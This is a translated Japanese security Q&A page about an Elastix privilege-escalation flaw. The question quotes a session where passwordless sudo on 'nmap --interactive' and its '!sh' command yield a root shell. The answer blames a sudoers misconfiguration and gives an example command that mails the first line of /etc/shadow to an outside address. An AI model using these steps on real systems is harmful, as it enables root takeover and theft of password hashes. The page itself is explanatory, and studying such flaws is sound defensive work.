web-dev-qa-db-ja.com

Elastixのこの権限昇格の脆弱性はどのように機能しますか?

Elastixに権限昇格の脆弱性があります。

# id
# uid=100(name) gid=101(name)
# Sudo nmap --interactive

# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
# Welcome to Interactive Mode -- press h <enter> for help
# nmap> !sh
# id
# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

通常のユーザーはどのようにしてSudo特権でnmapを開始できますか?ここで正しく構成されていないものは何ですか?

出典: http://seclists.org/fulldisclosure/2012/Mar/234

3
ramailo sathi

構成の誤りは、グループ、またはsudoers.confのユーザーエントリのいずれかから発生します。これは、(Sudoに関して)誰が何をできるかを制御するファイルです。この例では、コマンドで判断します(編集されていない場合)。sudoersファイルには、パスワードを入力せずにSudoコマンドを実行するためのユーザーアスタリスクのエントリが含まれています。

nmap --interactiveの場合-これは少し前に削除されました。システムを悪用するためにnmapにいる間に誰かが使用できる回避策がありました。例えば。:

nmap> !head -n1 /etc/shadow | mail -s shadow [email protected]
3
munkeyoto